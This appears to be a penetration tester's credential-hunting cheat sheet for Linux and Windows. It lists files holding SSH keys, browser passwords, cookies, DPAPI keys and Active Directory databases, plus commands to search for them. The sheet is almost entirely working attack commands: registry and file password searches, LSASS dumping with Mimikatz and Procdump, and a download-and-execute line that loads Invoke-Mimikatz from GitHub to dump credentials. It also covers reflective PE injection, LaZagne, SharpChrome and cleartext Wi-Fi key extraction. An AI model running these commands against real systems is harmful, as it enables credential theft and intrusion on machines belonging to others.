Grep recursively search for string under path
grep -r "password" /home/kali/Desktop/10.10.10.152 2>/dev/null
directory name = .git
python3 git_extract.py gitfilename
.ssh/id_rsa||id_dsa||id_ecdsa||id_ed25519||id_ecdsa-sk||id_ed25519-sk
bitvise ssh private key path on windows
C:\Users\username\.ssh\id_rsa||id_dsa||id_ecdsa||id_ed25519||id_ecdsa-sk||id_ed25519-sk
/user/.ssh
/home/user/.config
/root/.config
find *.log, passwd, username, credential
C:\Users\username\Documents
C:\Users\username\Downloads
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
.github folder
setupinfo
setupinfo.bak
*.bak, *.db
*.pdf
*.zip
*.7z
*.gz
*.sitx
*.rar
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Network
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies
%LOCALAPPDATA%\Google\Chrome\User Data\Local State
%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Login Data
%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Network
%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Network\Cookies
%LOCALAPPDATA%\Microsoft\Edge\User Data\Local State
%APPDATA%\Roaming\Microsoft\Protect\<SID> -> DPAPI Keys
%SystemRoot%\NTDS\ntds.dit(Active Directory database)
%SystemRoot%\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx(Windows event logs)
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
in all files
findstr /spin "password" *.*
Config files
where /R C:\ unattend.xml
where /R C:\ web.config
where /R C:\ sysprep.inf
where /R C:\ sysprep.xml
where /R C:\ *pass*
where /R C:\ *vnc.ini
where /R C:\ *ultravnc.ini
Registry
reg query HKLM /f password /t REG_SZ /s
#Putty keys
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there
### VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKCU\Software\TightVNC\Server"
### Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
### SNMP Parameters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
### Search for the password in the registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Check all the folders and files under var/www/html
sudo tcpdump -i lo -A | grep "pass"
Linux:
check all user's .bash_history
/home/user/.bash_history
Windows:
(Get-PSReadlineOption).HistorySavePath
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
Mimikatz - sekurlsa::logonpasswords
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
lsadump::cache
sekurlsa::tickets
$PEBytes = [IO.File]::ReadAllBytes('mimiikatz.exe')
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "privilege::debug sekurlsa::logonpasswords Arg3 Arg4"
https://github.com/KiritoLoveAsuna/Penetration-Testing/blob/main/Invoke-ReflectivePEInjection.ps1
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
sekurlsa::minidump lsass.dmp
mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit
python3 /usr/share/doc/python3-impacket/examples/mimikatz.py oscp.exam/Administrator:December31@192.168.112.147
http://github.com/gentilkiwi/mimikatz/files/4167347/mimikatz_trunk.zip
It is recommended to extrast hashes using both mimikatz and pwdump
. .\SessionGopher.ps1(About
SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally.)
Invoke-SessionGopher -Thorough
.\lazagne.exe all
.\SharpChrome.exe logins|cookies|statekeys /unprotect
netsh wlan show profile
netsh wlan show profile ssid key=clear
